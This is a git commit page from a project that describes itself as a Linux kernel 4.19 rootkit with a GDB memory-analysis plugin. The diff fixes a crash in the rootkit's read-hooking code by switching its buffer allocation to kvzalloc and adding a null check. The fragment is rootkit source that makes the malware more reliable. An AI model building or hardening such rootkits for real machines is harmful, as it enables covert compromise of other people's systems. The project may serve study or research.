Don't crash on large buffer allocations - linux-rootkit - Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)

commit 6b329999ce0c9f531c19ef04e60d5f691be35b21
parent b19cc27f9a6cafa8c41ac305443837f10a4d3007
Author: Tizian Leonhardt <tizianleonhardt@web.de>
Date:   Sun, 29 Nov 2020 18:46:56 +0100

Don't crash on large buffer allocations

Diffstat:
M src/read.c  | 10 +++++++++-

1 file changed, 9 insertions(+), 1 deletion(-)
diff --git a/src/read.c b/src/read.c
@@ -121,7 +121,15 @@ handle_compare(char *buf, pid_t pid, size_t size)
 void
 handle_pid(pid_t pid, __user char *buf, size_t size)
 {
-    char *str = kzalloc(size, GFP_KERNEL);
+    //Sometimes (e.g. when installing packages), kalloc fails
+    //To avoid being limited by the page size, we use kvzalloc,
+    //which allocates chunks bigger than the page size if necessary
+    //https://lwn.net/Articles/711653/
+    char *str = kvzalloc(size, GFP_KERNEL);
+
+    if(!str)
+        return;
+
     copy_from_user(str, buf, size);
 
     //Early return on exact match, avoiding more expensive operations

	linux-rootkit Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
	git clone git://git.deurzen.net/linux-rootkit
	Log \| Files \| Refs